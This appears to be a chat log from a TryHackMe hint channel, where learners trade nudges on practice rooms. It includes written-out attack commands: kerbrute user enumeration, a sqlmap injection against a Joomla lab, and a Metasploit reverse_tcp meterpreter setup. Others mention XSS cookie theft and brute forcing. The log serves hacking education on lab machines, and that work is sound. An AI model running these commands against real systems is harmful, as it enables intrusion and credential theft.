#room-hints
ok
In the owasp top 10 room on task 19, I'm having trouble finding the default login and password hidden in the webapp's source code
the links to the javascript and css in the source?
View source gives you the client side code. That's not what you're interested in.
Ok. You buy a new computer, let's say. You turn it on and it's asking for a password. What do you do?
check the documentation for a password
Probably by typing "computer model default password" in to google, right?
Faster than reading the manual for sure.
You're welcome
Need a hint for the pickle Rick CTF room..
Found an ssh port and web port... on port 80... found some gifs and JPEGs in one directory... finally left with a username and some text in robots.txt... which doesn't make any sense... trying to do some steg on those gifs and jpegs... but nothing found out yet.
You already have a username, and another "word" found in robots.txt, why not try using DirBuster or Gobuster to find where to use that information?
Already did it...with gobuster
Just found an assets dir... and nothing useful in there...
Keep enumerating, try other wordlists and you will find what you are looking for.
Actually I have a question... dirbusting can find login pages??
Yaa..will do it
DirBuster or Gobuster are tools to find directory or file names (among other options) on web servers by brute force. They always depend on the wordlist you are using.
Ok
Hey, I'm doing the Attacktive directory room, enumerating users on kerberos. I'm running this command: ./kerbrute_linux_amd64 userenum --dc spookysec.local -d spookysec.local userlist.txt -t 100 but it goes through the whole list without matching a username, is the command missing something?
Nvm, figured it out.
kinda lost on the owasp top 10 room task 29. Is this the correct exploit I should be looking for? ||https://www.exploit-db.com/exploits/49314||
Network Services 2: Task 10 — Exploiting MySQL:
How in the Hell do I find this?
@iron hedge Try looking for an RCE 🙂
@light tundra This one's a sub box so might be worth asking in sub room. Otherwise from your description try using the find command to search for the MYSQL.txt file. (There's a room on that if needed.)
@hearty widget on my machine or the target
@light tundra My assumption is you're looking for the MYSQL.txt file so you will need to do that on the target machine.
okay thank you
I'm at the 2nd level of https://tryhackme.com/room/reloaded, but when I try to save a patch with SavePatch.py and try to run the exe on windows, it gives an error
should be #room-help but I'd still appreciate the help :)
Investigating Windows 3.x
Question 27 : What is the full registry path that was queried by the attacker to get information about the victim?
Could anyone help me on this please ? I browsed through logs for hours, tried countless filters, followed the hint, I can't find it.
@rustic surge What's the error?
"Incorrectly installed the file"
or something in that direction
Sorry read your message wrong, figured it was an error from the python script. now i reread it's for the file. Not done this one, sorry.
Task 3 on the OWASP juice shop doesn't at all tell me what it is looking for in the answer boxes
@iron hedge Question 1 or 2?
Both, I've logged on as admin but I don't see anything that fits the answer format
If you follow the question steps you'll receive a popup answer at the top of the home page.
if you missed this and closed it you might need to restart the box.
Hi, I'm in battery room, so far I've collected an ||ELF binary where I think it's the admin password but wasn't unable to find it|| and I've found ||/admin.php|| which I think it could be vulnerable ||to sqli|| but not that sure. Any possible hint, please?
I'm having difficulty at room network services task enumerating SMB
What ip should i scan?
nvm
You should check "in more depth" that ||binary||, and read about ||SQL truncation attack|| or ||Null byte injection||. Note that there are several ways to bypass that part.
Hey all, having a wee issue with a question in network fundamentals 2. trying to run ./bash -p and its throwing:
cappucino@polonfs:~/.ssh$ ./bash -p
./bash: line 7: syntax error near unexpected token `newline'
./bash: line 7: `<!DOCTYPE html>'
any ideas?
That looks suspiciously like you downloaded the webpage rather than the binary
Based on the fact it's HTML
that would make sense! thought I was being smart using my new wget command 🙄
am I best off just going to the webpage and downloading it manually and cping it over
okay, got the proper file in there now and it does not throw errors now, but still outputs nothing... any ideas?
If it's from github, you need to grab the raw link
But it likely doesn't have the right permissions
Permissions need suid
And what James said
currently sitting at: -rwsr-sr-x 1 cappucino cappucino 1113504
ah okay doaks. must have messed something up on the way here. Ill start afresh as I have no idea how to change the owner!
thanks chaps
That's a google able question ;)
ohoho, I gave "sudo chown root bash" a wee go but still no dice 😂 back to the drawing board
Look up the man page
Yep
You'll need to do it locally though
Then you modified it so it lost suid
Not on the target VM, also that
aw fantastic chaps. got it now, order is put file where you want it > set owner > set SUID
cheers guys!
Or do it all as root which is bad practice
bad practise? none of that here 👀
Hi all, looking for a tip for Daily Bugle room. I'm running sqlmap against the DB and sqlmap reads, "sting for SQL injection on GET parameter 'list[fullordering]'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y" I selected yes, but was that correct or would MariaDB(saw that in the nmap scans) benefit from those additional payloads?
Try to hit "enter" rather than typing "yes" as it'll just obey what you want. So pressing enter, it'll ignore the prompt and move on. If I am not mistaken.
Thanks, do you remember how long that scan took for you?
I know it's dependent upon hardware and environment, but generally?
Errr, I did notice the time but am not sure to be honest. But, it depends on the connection speed (as in my case, net connection speed was slow and it was taking much time)
Haven't heard this script's name before
It doesn't quite ignore the prompt, it just goes with the default for that prompt i.e. The capitalised option. In this particular example: Y
Pressing enter seemed to kill the process for some reason
I'll go with the capitalized options
Not really. It just works fine while ignoring what it asks us. For eg "Do you want to skip test payloads specific for other DBMSes? [Y/n]", pressing enter will ignore what it had asked. I can also be wrong for sure
I am doing the "investigating windows 3.0" room but question 17 does not seem to accept my answer even though I am quite sure it is correct. Anyone done this room recently and could check my answer?
Hi I'm trying to complete the Osquery room but am stuck at Task 9 Windows and Osquery at question What is the schema for win_event_log_data?.
I've found the "source" for the query but I'm stuck at how to "translate" this into a query. I've tried https://uncoder.io/ but so far no luck.
Does anybody know where I could look in order to complete this question?
Any help would be appreciated 😄
Were you able to find a solution? I too am stuck at this. And no solution has been provided in the previous discussions. 🤔
Ignore the above. It worked after I restarted the target machine. Dunno why it didn't work the first time.
Sorry, was looking elsewhere but good to see you got it 😄
@gusty kite I can check, you can dm me
Question on Daily Bugle and sqlmap. When I run sqlmap -u sqlmap -u "http://10.10.56.37/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --tables -D joomla I get a list of the tables in a format that appears like ##tableName, when I try dumping the tables using that format sqlmap says it needs a table name, I'm guessing the ## is commenting it out. So I try without the ##__ and still get an error. I ran the py script and received a table name different than this format. sqlmap gave ##_Users and joomblah.py gave fb9j5_users which I'm able to run sqlmap against. Why the discrepancy, what am I missing?
Thanks, let me double check my dump. I
Yea, weird, I still can't pull it using '#_users', but using fb9j5_users I can.
the fb9j5_users came from joomblah and the #_users came from sqlmap
unless the other table is in another DB, but I'm fairly certain it was the joomla DB
Common Linux Privesc: task 6 - openssl passwd -1 -salt ["new"] ["123"]
the command is correct, though answer is not coming up correct?
Remove the quotes and square brackets.
thankyou
Check out task 3. There's an example query that does just what you need and shows you the format you should get for the answer. All you need to do is change the name of the table.
In Networking Services: Task 4, how do i open the files that are in the directory or preview them in the console? I've tried cat, curl, and just "open" lol
and nano. But none of the commands are found
hello, i'm trying to complete task 4 in networking services, i was able to use smbclient to get into the share but i cannot open the text file
@frank wasp Are you referring to the smb.txt flag?
you might have to download it to your machine and then open it
i’m referring to the part where you’ve just connected to the share via smbclient and there’s a .txt file you need to read the contents of
Anyone got a nudge regarding the privilege escalation in the couch room?
@frank wasp If you mean "Working From Home Information.txt", then the command is more.
syntax: more "filename"
i tried that and it was giving me a blank file, does it have to be in quotes?
@frank wasp yes
ah that must’ve been it, thanks!
Gave +1 Rep to @twilit mauve
^ currently got a shell as atena and couchdb
@nop I too am stuck in privilege escalation part of couch. Please let me know if you find something. Tried kernel exploit, not working
same here
same here
history whale mnt
same stuck on the same part, this exploit has to be new to me xD
got user in 45, stuck on priv for a few hours
same, flew through whole lab, found the user password after already popping a reverse shell
while listing files in term xD
stuck on last part
docker related for sure
there is actually a kernel exploit that works
Nice, dont think thats the intended way though haha
just finished it
congrats
hi, i'm playing the couch room and i already rooted the room but i can't find the root flag
rooted without finding the root flag?😛
yeah 🙃
any hint where the root flag ??
all i can say is you dont have to think too much,thats the most easy part with this room 😆
oh so the root flag was hidden intentionally, I thought that was a bug that's why i asked
I am unable to find credentials in the web administration tool on the couch
google is your best friend
there are no writeups on couch
google on how to administer couchdb through browser
If you found the port where something is waiting for you, read their official documentation.
Was it actually docker related like you thought? (I'm stuck on the privesc)
Also still looking for a way (the kernel exploit i tried didn't work)
i got root but searching for the flag
Mind giving me a hint on how you proceeded?
If you already got access to the administration toolkit just take a look around the DBs and tables
It's always good to check if the file where the history of commands executed on the system is stored has valuable information...
Hi there....if someone could hint me on how to proceed with task 5 for room Sakura...I would appreciate it...it seems that the user does not exist on twitter and hence I am unable to proceed
The find command is your best friend in finding that flag.
Haha, couch was one trippy room😂😂
thanks man
Gave +1 Rep to @brave vale
Search for text rather than users
Same here, the PrivEsc part is really shady xD
It was staring me in the face the whole time...
Thanks for the nudge, I finished〜!
Gave +1 Rep to @brave vale
Many thanks...didn't think it was that easy, if you look where you need to look.
It suddenly came sometime back...not sure man what happened
The Linux Fundamentals Room, where different switches for find command are explained is gold for this part.
Hey! Doing couch room! Any hint for getting root
Yeah i know, i should've been more patient until it got me back with the results
thanks i just found the root flag
Gave +1 Rep to @lost snow
Hint is the user directory
Bash history might contain some information
Is docker the way to get root?

Anybody completed the room couch?
yes
room-couch
que-6
can't figure it out
You will find the answer in the official documentation, take a look at the API reference.
thnx
👍
hey guys am on bookstore box, am stuck on the privesc any hints ?
Ulrich Boltaz:
Anyone completed kiba room
I need help on gaining shell
Anyone completed linux fundamentals 3?
best to ask, room task
Just ask your question directly
I'm stuck on Networking Services 2 Task 3. When I try use SSH to log in as the user "ubuntu" it says Connection Closed
I don't get why it closes the connection
are you sure the user is correct
you found the user earlier in the room
but it asks for a password, even though i've supplied the id_rsa
if it wants a pass, the id_rsa is not associated to that user
Thank you 🙂
Gave +1 Rep to @glacial gust
np
What's the technical term for a connection successfully established in Session OSI model?
session(s)?
I did my first write-up, if someone wants to check it, here's a link
https://ekimik.medium.com/jack-of-all-trades-tryhackme-1dcadaac36eb
nice try
Hello guys, I am doing the Common Linux Privesc room and have a question about task 4. It is about the LinEnum script. Can i answer the questions only with the output of the script or do i need to research myself?
There are other ways to get those answers but you can also use LinEnum just try increasing the level to 1 with -l
Thank you very very much!! 😁
Gave +1 Rep to @candid nimbus
Is anybody else having application error trying to access the OWASP juice shop website?
https://imgur.com/a/w6QEv6G
oh well look at that, while typing up a couple of questions to some friends about it - OWASP juice shop webpage starts working yay!
Hello guys I'm kinda stuck with last question of Splunk2 room. I need to find a single webpage contacted by schedule tasks. Any hints please?
Hi all, in brainstorm room which I know its a bof room BUT as nmap stated 3389 open i decided to check out the bluekeep exploit and it worked a treat. nmap to root.txt in 10 mins. just wondering, is this common or quite rare ?
It's not a race, do the room again by exploiting the Stack Buffer Overflow (which I think is the intentional path of doing the room) to practice, I think that's what matters, practice and incorporating new knowledge.
Can't agree more, I only started BOFs this week. I suppose I still got "attack the ports" mentality from previous weeks learning. thanks
Gave +1 Rep to @brave vale
You can also report it in the #room-bugs channel, surely there will be someone who can tell you if it is intentional or not. I recommend the Buffer Overflow Prep room (https://www.tryhackme.com/room/bufferoverflowprep), I started it a few days ago and complementing that room with other sources you will learn a lot.
yeah, done that room already. cheers tho
Hello guys!
Please I need help pertaining to setting up my metasploit.
After launching the msfconsole, running the command to check the database status "db_status" shows that "postgresql is selected, no connection"..
Please help on how to connect it, I've done tons of research, all to no avail..
PS: I'm a beginner
do you have a postgre database running?
Omg, your question helped!
Running systemctl, I discovered postgresql service has stopped, so I started it and trying "db_status" command on msf again, I got "connected to msf"
But I've done all these some couple of days ago, I don't know why it worked 😅
the whole "no connection" is a good hint, tbf
Exactly but I did this same thing some days ago and didn't work😩
Working now is a mystery but hey who cares? So far it works..
Thanks man!
Gave +1 Rep to @ripe hedge
I am completing the Linux fundamental part 3 room and in task 6 ( maintaining your system: automation).
And the ques is
When will the crontab on the deployed instance run ?
But there's no entry.
And answer length is 7 .
Please help me here
@hearty widget can you please elaborate the syntax.
I've already basically given you the answer. you just have to read it
you know where crontabs are yes
check my comments in the DM
and how to read them
There are no process and lines on the crontab.
What command are you using to open crontab?
Ok I'll recheck
@wide ocean did you "crontab -e"?
Yes it's mentioned in the task only I did that.
Once that opens you have only one line not commented (commented lines are the ones with # at the start)
should be in there, only it's not the typical syntax
Got it.
I restarted the Machine several times and there's nothing before.
I am on level 13 I know the commands and all.
Btw thanks for the time and help
Is this what you have?
Yup got rt now
ah super.
I've followed the steps in the walkthrough but exploit failed and msf is not creating a session for the attack, please help
make sure your options are setup correctly?
Seems like it cant reach the IP set
Make sure the box is still online, try to ping it etc
after trying several times, I got a completed exploit but no session was created...
Running the sessions command shows "no active sessions"
If I'm not wrong then it's a ice room. Will you show the options?
db_nmap -sV IP address
use 5 (number for exploit/multi/handler)
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST MY_THM_IP_ADDR
use icecast
set RHOSTS DEPLOYED_MACHINE_IP
exploit
Screenshot, please
Don't use exploit/multi/handler
Only use icecast_header exploit
Ohhh.
Let me try that out...
I will try to send the screenshots
You are a hero man, it worked!
Thanks buddy!
Gave +1 Rep to @spice shard
hey guys
i have a problem with entiring network
last task of pre security
can someone help me
with sending tcp packets to computer 3
anyone here
in spite of router it doesnt set on his local host
yeahhh???
plsss
last question
i need help
Basic Malware RE it says u don't need to use any disassembler. so I extracted it with simple 7zip. file and i got a file .rdata which is the key. I opened it with xxd still i can't get anything clear what to do
@upper mulch Which room? which task?
how can someone see the flag without decompiler..??????
@sturdy shadow Not done the room but you can either check the write up or imo just use ghidra.
that's right ghidra will work. But it says don't use any debugger
@sturdy shadow scrap that, just had a look. If i'm reading it right you should be able to strings the file and you'll get the information you need.
I saw strings and lots of strings.. And something which i 90% sure useful but i can't see what..
ghidra is last option
Sorry. I've just opened the task for myself. Ignore my previous comments. So it seems you can't use ghidra but you can use code analysis tools (IDA, Codebrowser)
Actually tbh, i don't think it matters. I think the point is to find the details manually regardless of tool. Sorry not very helpful here lol.
Nope no issue. Thanks
Gave +1 Rep to @hearty widget
where this rep goes?
I saw it somewhere, let me check and confirm.
Can't remember, think there's just a leader board somewhere though.
yeah entering network but there was an issue but its fixed hopefully
I m doing mindgames room any hint for getting root??
Hi guys! This is Cross-Site Scripting Room (XSS-Key Logger)
• I'm trying to understand further about XSS' Key-logger, can someone let me know why should I change the "console.log(1);" and how do I tell what should I change?
Good luck
Also gtfobins may help
Please why is meterpreter session dying every time? Who's Killing it😭
I already got into the remote machine but after few seconds, it dies.
Any reason why this happens??
Please elaborate which room you're doing, which exploit, payload you're using. Provide screenshots.
I m not able to get root any hint how can I get

Linpeas should flag an interesting binary
Yeah I got that one openssl
I tried looking for it in GTFO bins
Haven't got anything special I can't find any other way
Gtfobins has an entry with an unusual attack vector
Especially for the capabilities that the binary has
You'll have to do a bit of research to figure out how it works though
Okay let me see
But once you figure it out the actual exploitation is fairly straightforward
i am still having a problem with the task
did u get a resolution
Is anybody able to help me with this?
basically its saying you can make it write to your domain instead of just the console I believe
I suppose it's my own domain with my ideal location I want the record to be right?
yeah
I am having trouble with this question, "Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format)?" where can I learn how to use the symbolic format?
I think I know the room you are doing, doesn't it talk about symbolic format?
theres a section in that with symbolic format notes
Got you, thanks man!
Gave +1 Rep to @toxic shoal
Hi everyone !
I'm currently stuck in the Windows Fundamentals pt2.
Dont understant the question about msconfig : "Whom is the Windows licence registered to " ?
Understand* sorry
It's about the Windows services field
It's a complex question it takes me ages to solve..
Actually it's a silly question in my opinion.. think about it.
I don't find any services which matches with the answer
If u purchased something like a product. Then my question is who purchased this product.
So answer is I purchased this product..
Gave +1 Rep to @sturdy shadow
Nope
I've subscribed
I was thinking that is was a foggy question
Hahaha
I've tried more than 4 hours une the services filed
Field
Of msconfig
I don't understand the relation between msconfig and this question
Yup
Thanks a lot
Extending Your Network -- I tried to respond to arp request but it doesn't show on the network log, data: computer2 from computer2 to computer1.
Is it supposed to do that, or I'm wrong somewhere?
computer 1 to computer 3 -- that or the vice versa I can't recall which way around from the top of my head (:
It also needs to be a tcp packet
Yeah it's computer 1 to computer 3 - when I do that, it keeps saying "ARP REQUEST: Who has router tell computer1"
You do not receive the pop-up message with the flag?
In Data write Hi or whatever you like.
Same thing 😦
Try to do it from the following URL https://static-labs.tryhackme.cloud/sites/net-simulator/?config=introtonetworking
Remember to write something in Data.
FINALLY, thank you so much
okay....webenumv2....the nikto practical, last question about the jboss cookie...
I've played with outputs and displays and there is no mention of cookies
either what am I looking for or what am I supposed to be entering into the cli that would bring it up?
so far I've done nikto -h IP -Display 2 -Output V
I recently completed solving Binex THM room, and while solving that room, I found this ....
Photo from Soumyani1
I'm not sure, but according to my knowledge for finding offset, do we not have to copy the RSP register value, rather than RBP...???
Please correct me if I'm wrong ❤️🙏...
Windows Fundamentals 1, Task 3:
I don't know why this question is baffling me. I can't find what the answer looking where it should be on the VM.
It is literally the one question I have to complete the Pre-Security path lol
What's the square-ish thingy called? I should ask: Where does it take you?
thx much
Gave +1 Rep to @brave vale
To the ||notification center||?
You got half of it. I think I went in to customize the notification area and found the correct option there if i'm not mistaken
I'll look around. Thank you
Gave +1 Rep to @undone quail
no problem
@undone quail any idea what would work on the nikto question I asked earlier? the one to find cookies?
that was not the half I thought I had correct lol
So you found it?
yep 🙂
Awesome
Im looking for a hint on Pickle Rick. I have gotten the first two but have been stuck on the last one for some time. Any help? EDIT: Got it, nvm. Totally overthinking it
Nmap room: i think I got the wrong attack machine ip... is the attack machine the iplisted at the top of the screen?
Its the part titled "Active Machine Information"
The green ip address at the very top is yours.
🤦‍♂️
Thank you
Gave +1 Rep to @river musk
Hi guys, I'm doing the owasp top 10 room and I'm stuck on the part where we've to find non-root/non-service/non-daemon user count
I know I need to examine the etc/passwd file but I need help with how to proceed with that
User has uid >= 1000 (:
Be careful with that in other scenarios, in my Mac my default user has a UID of 501.
Okayy, thankyou for letting me know. TIL something new. Thankyou @brave vale
There is an executable.exe file in user/share file in victim machine accessible via SMB, how can i transfer that to my kali machine?
Using get command
Hey I m doing susta room! Any hint for getting in? Like I have just started and I can't figure out what can I do
Try to "guess" the correct number, if you encounter something that prevents you from doing so, you can search for information on how to bypass rate limits.
Thank you.
Gave +1 Rep to @spice shard
Hey, got a quick question on the Zero Logon room, task 4. I've run the zero logon exploit, and now I'm trying to run the secretsdump.py script and getting connection errors for port 445 (which didn't show open on a nmap scan). Any hints to set me in the right direction with this one?
nvm, i was using the cmd wrong
im doing the linux fund, what is the password for the ssh
I cant find it for the life of me dude
and I aint using the browser
Hey all! I'm going through the HackPark room and have a problem with the hydra command. The way it is shown in the text doesn't seem to work. I've adjusted the command so that it worked, but it slowed down the machine to about 5 req/minute... anybody able to help out?
Can someone help me getting root privileges with apache2 without a shell escape sequence?
tryhackme
I have done it, you can dm me if you want
linux fund3 - task8 - the user I ssh'ed with has no privileges to read the apache log file. Is this on purpose?
Edit: Nvm, I see what you guys did there -.-
How websites work - task 5: "View the website on this task and inject HTML so that a malicious link to http://hacker.com/ is shown."
I don't understand how see the source code of the website. In the task 4, there was a direct link to see the source code but there is nothing there.
you can see the sourcecode with f12 on your keyboard or do right click and click Visit sourcecode
but i can see all the source code of THM
how to look it ?
It's german do not wonder
But if i am right informed you do not need this for Task 5
I need to be able to add something to the code, but this is not possible
nope
I have searched and searched, but I really don't understand
I'm doing "Windows Fundamentals 1" could I get a hint for Task 3, Question 3: Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?
Anyone?
look closer at the messagebox on the right
Sorry to ask again, but I am stumped as to what icon is missing, like all the icons in the question are the only icons there!
I'm doing "Windows Fundamentals 1" could I get a hint for Task 3, Question 3: Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?
Without giving it away this is the best way I can think of to describe it- you are looking right at it, perhaps figure out the name for every icon you see
There are some links to MS documentation in the lesson, take a look
can someone give me a hint on extending your network task3 of networking nerd????
Already done it now.
Which question?
anyone know, What is each section of an IP address called?
O##et
is that answer for ip?
pardon, which room?
what is networking?
?
the room, what is networking, right?
yea
this is enough hint
not correct
ok
Read the text task again, the answer is there.
What layers of the OSI model do firewalls operate at?
could you please help me
I am trying to solve this but not passing at all
Looking for some help on how websites work and what I'm looking for on the java script in pre security
I found what I believe to be the credentials but not working
The correct answer is commented out in the javascript on the page in question, is that the one you tried?
Will dm you
The answer is in the section about IP addresses, be sure the spelling and plurality is correct.
i don't need help anymore, i just wrote the answer wrong, my fault xd
I'm in the Upload Vulnerability Challenge. I can upload and find a file to the server. I have a reverse shell for the NodeJS framework, but activating it in the admin page only leads to "Module does not exist" instead of a reverse shell to my nc listener.
Any ideas?
I am having troubles with answer format in Linux Fundamentals Part 3
Is that the whole output of cat /etc/crontab? because it seems like there is something missing
Yep, that's literally it
Try using just:
crontab -l
(I think it is)
yep, I tried this, nothing interesting here
hi, im doing Linux strength training room V2, just curious, why did kali read scp username@ipaddress:/path to directory/'system AB'/ab as /path to directory/system and /path to directory/AB? Any idea how to solve this?
Very bottom line. You're not looking for a time. You're looking for a system event in this case
I am dumb, I've put it before without @
Thanks a lot
in case its hard to understand. here it is
You need to put the whole path in quotes:
"/home/sarah/system AB/db/ww.mnf"
I did but it still does the same thing
or must i use double quote? that shouldnt matter right?
I think it might matter. I tend to use doubles all the time
Tried it. turns out to be the same. doesnt work either
Is it giving you the exact same error message?
yeah
What is each section of an IP address called?
read the room again
thats the biggest hint
it should be in the description
and try to understand what you are reading
I can't find it
.
I did
read it again
be patient, hacking requires patience
dont hunt answers
try to learn something new
Done
How do you write IP address? @amber wagon
yay
Octet >
Its ez you don't know ?
1,2 seems like ascending
yeah, it is ascending
I am trying to help you (:
How many sections (in digits) does an IP address have?
Its 0-255
but didn't work
also I did 250
didn't work @midnight anchor
@amber wagon this is why I asked you this question
How many sections (in digits) does an IP address have?
yeah thats what i ve been trying to tell you
Is this research question, or am I missing something
thx
Gave +1 Rep to @midnight anchor
i researched it when i did the room but thinking about it its quite logical
It is 7 and 4 as for me, but that doesnt seem to work
Deploy the interactive lab using the "View Site" button and spoof your MAC address to access the site. What is the flag?
How do I do it
I did request website
Is at least one correct?
its not 7 and 4, research it
But got no hint or anything
How to make your device appear as another?
yay I did it
Good hint!
got it. Thanks
search it on google
What is syntax
Syntax = format. So it's basically asking you how would you ping that IP address
I rage hacking I will learn graphic designing
I'm doing the OWASP top 10 room task 5, and I'm so clueless as to what I should put in this box to find what it wants me to find
it asks what the user's shell is set as, is that like its home directory?
I thought it was "/usr/sbin/apache2" but apparently not
fits the answer's formatting perfectly
Have a read of this
https://www.ibm.com/docs/en/aix/7.1?topic=passwords-using-etcpasswd-file
ohh yes the etc passwd file
cat'd the passwd file and grepped the username and found it
thanks 😄
No problem
In NMAP's room, there's a question that's troubling me!
Does the target (MACHINE_IP)respond to ICMP (ping) requests (Y/N)? Unable to understand what's the target ip here?
It'll be the one of the machine you're running, at the top of the page
You need to deploy the machine in Task 1 to see it
Yes, this works. Thanks mate!
Gave +1 Rep to @forest moss
No probs 🙂
Hi I'm working on Network Services Task 4: Exploiting SMB. I'm unable to get it to work in the attack machine.
I got the first answer correct so I think my syntax is fine but I get the following error when I put it in the terminal
" WARNING: The "Syslog" option is deprecated, and Connection failed (Error NT_STATUS_HOST_UNREACHABLE)
thanks for any pointers.
okay. If I'm already stuck, I don't know how I'm going to make a career out of this lol:
OWASP Top 10: Command Injection Practical
Is it asking me to actually hack into the root directory using injection? Because I can't find any other way to navigate to it. and I'm unaware of any particular exploit we're to use
unless I need to figure out vulnerabilities myself, etc
Can't recall this one that well, but have you tried just injecting a command that shows you the contents of a directory?
like literally injecting a shell command?
Yeah, bear in mind it's not asking for the system root directory, but the website root directory
yes
I don't remember figuring out any vulnerabilities on that one, I thought it was just basically getting it run the commands and it would give you the answer. Sorry. Did it a few weeks back so a bit hazy on it
yeah it seems like it, I appreciate the help
I just need to go back and just practice or refresh more
I suppose a lot of this career is muscle memory
And taking lots of notes. I use Joplin to track all my stuff
I'm not great at keeping notes lol
S A M E and it bites me in the ass every day.
I started using Notion to take notes, especially during work engagements, and it's been fantastic.
in case you didn't get it, you can use pwd
oh sorry, i mean ls
lol i did try that out a few times myself to see if i could move around but with no success
OWASP Top 10.
What does this question ask from me?
I've already changed HTML in later task
What exactly should I override to get this flag?
@gloomy nebula it’s been a little bit since I’ve done that room but I’m almost certain in each section they have examples that directly correlate to the questions asked. The first one you’re mostly inserting a stored xss, second you’re overwriting whatever element is being used to display “XSS Playground”
Somebody please give me a hint on finding the last flag on Eternalblue.
I'm thinking maybe I'm suppose to find a way and activate the Administrator account so to access the Admin folder but I'm lost..
Please give me a hint!:weary: :weary:
If you've followed all the question of blue room, then you are able to grab flag.
If you get a valid xss, you will see your flag popped up
Omg, will read all over again😭
It's worth giving it a try, but harder this time (:
Thanks man.
On it!
Gave +1 Rep to @spice shard
Thanks buddy, it wasn't as hard as I thought😅
I was just complicating things for myself..
Got the flag, Thanks man!👍
Gave +1 Rep to @spice shard
Windows Fundamentals 2 [Help Required]
Can anyone give hint regarding "Command for Windows Troubleshooting"
Ye, got this, question is a bit misleading, I was meant to just insert some tags, like <b> in comment section. Not document.write as I did before.
You can open the Troubleshooting using control.exe and an argument
Maybe I'm not typing the answer in the correct format for the question about what layers of the OSI model do firewalls operate at. I can't seem to get it to like what I'm putting in so far.
The format is Layer X, Layer Y
Thanks, looks like I have more than just that as the issue. I must be missing something with my thought process
Gave +1 Rep to @rain latch
how do i go from one module to another in metasploit without quitting and then reloading metasploit...
Do you mean when u got a shell/session or simply after selecting a module?
after selecting a module
Simply with the use <Module> command
so if i wanted to search for another module: search mysql_hashdump - how would i access that when i am already in mysql_schemadump without quitting metasploit
hope that makes sense...
im currently doing the extending your network room
and im having to stop the attack on the website
what rules would be needed?
drop requests from an IP address
what ip would be best??
the one that attacks
from the ip or to the ip?
from
you want to disallow the IP to make requests to the server, not disallow the server to send packets to the IP
what ip would i send the drop to?
if I remember correctly you have a kinda "interface" on your right side in that room where you can specify the information
Can anyone give a hint to getting foothold on blog room
read the text it shows you before the simulation starts, it will tell you which destination and what port the packets are being sent to, and from the flow you can deduce what ip you should block as the source
thanks!
Gave +1 Rep to @wooden mist
Is anyone having issues with the OSI practical game. It says to use the space bar to enter the door but nothing seems to work, I have tried using other keys along with the space bar and still nothing
I used the arrow up key I think
I have tried that, I have literally tried every key. I don't know if you have to use a combo of keys or it is just broken
i used left right then space to get in each door
That is the last flag I need to get the whole Pre cert
@raw parrot are you using the attack box or VPN from your machine?
hello i am stuck on one last question on dns in detail. im using the vm but i dont think its giving me the right info for the cname on the ns look up cmd
i can send screen shots if you want
That'd be helpful...
@rain latch message me and i can send you a print screen
Hello I wonder if I can get a hint so I'm at the beginner level at owasp where I should get the tomcat developer's name, and I tried to submit it for like 10 minutes now but it still not accepting it.
Research!! (:
think org not person
I am currently working on upload vulnerabilities, and stuck on this task, because while using burp as proxy site completly refuses to load
All other sites work as intended tho, so this is something sketchy about this java.uploadvulns.thm
OWASP Top 10, Task 1: command Injection practical—
I can't find how the user's shell is set. I've googled and trial & errored for a while now. I'm guessing it's in /bin/bash but I don't know how to see the contents of it 😦
Is your request appearing in Burp?
Is this the first web site you've tried tonight? Or have you just finished one and moved onto this one? I know if you've restarted the target VM your hosts file will be incorrect
You need to look in the passwd file
no, it is not the first one
Does it load if you are not using Burp?
nwm
yes, it was
I resolved it, seems like there was multiple IPs in my hosts file
After removal, works fine
Ahhh that one gets a lot of people
Maybe put it in hints, or somehow mark that this may be a problem
Hello! For Linux fundamentals part 2 is talking about ls command and ask "What flag would we use to display the output in a "human-readable" way?". The answer is in the format of 2 char, I thought is ||-l|| Can someone help me? I really don't get it :)))
Hey, did you check the man page?
I got it now😅
nice, next time try searching the man page with grep 👍
I thought it's just metaphoric :))
Hi, im doing the XSS playground room for stored XSS. The task tells me to put a script that sends a cookie to the attacker machine whenever a user visits the webpage. It says to wait for a user named Jack to visit the webpage. I waited and refreshed the page for quite a while but did not get the cookie from Jack. What could I be doing wrong?
Nvm, problem solved. The cookie looks alike and i've mistaken it with my cookie 😫
Specify your question please and people are ready to give you hints
Where to start looking?
I found a wordlist at /announcements
I found a /phpmyadmin
Also a /phpmyadmin/setup
I assume I have to brute force the /phpmyadmin/setup with hydra specifying username as "admin" and password list as "wordlist.txt"
But it's taking too long so I just wanted to know, am I going in the right direction?
Maybe in the wordlist there is duplicate word ?
What should I do??
There is a command line to eliminate all the duplicate words
try this ? sort -u inputfile.txt -o outputfile.txt
what is the ctf you are doing ?
A Different CTF
uh,well.I am stuck while trying to deploy a machine in linuxfundamentals1
I am not able to connect on the IP
you try to ping it ?
what is the nmap result ?
I mean for the linux machine
the virtual machine
i don't know i use my own VM
I'm trying to install seclists on the attackbox for the OWASP Juice Shop room, but i keep getting the error "unable to locate package seclists"
You can download seclists from github using git clone and then move seclists to /usr/share directory
oh i tried using git
but i derped and forgot where it put it xD
Didn't realise it was put in the /root folder and not where it's meant to go
Thanks!
230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 500 Illegal PORT command. ftp: bind: Address already in use ftp> pass Passive mode on. ftp> ls 227 Entering Passive Mode (10,10,169,101,174,110) hello guys i have a problem, when i want to connect with ftp the server do give me back the listing
is this a port problem?
Guys, what am I missing, I am stuck with Jewel (file uploads) challenge. I uploaded my Node.js revshell, found it, and can't execute it, admin page keep saying, that there is no module
Are the jpgs in the folder you mention in your admin page screenshot?
Did you manipulate the magic hex?
Yes
Yes, also, according to hints they should be there
Sadly I did not make a writeup for that room and I only remember that there was something with the magic hex or the file extension. Try to leave everything as it is that gets checked on the client side and remove the javascript that performs the clientside checks with burp
Without that JS button select doesn't seem to work, but I'll try, thanks
Gave +1 Rep to @rain latch
show me
Show you what?
only remove the client side checks javascript file (whatever exactly it's called) not the one that performs the upload itself
he was just asking?
he is not available, come back later
I think for the challenge, you don't change the hex or it doesn't work
Can anybody give a hint to Jenkins room
Finished scanning and I’m kind of lost
Found login page on port 8080
That's what I said since the hex check is clientside
afaik
Don’t know what to do from there
Tried doing dir enumeration
Nothing coming out of there
Try some default credentials 😄
Thank you…. Don’t want to call myself stupid for not thinking in that direction
Gave +1 Rep to @rain latch
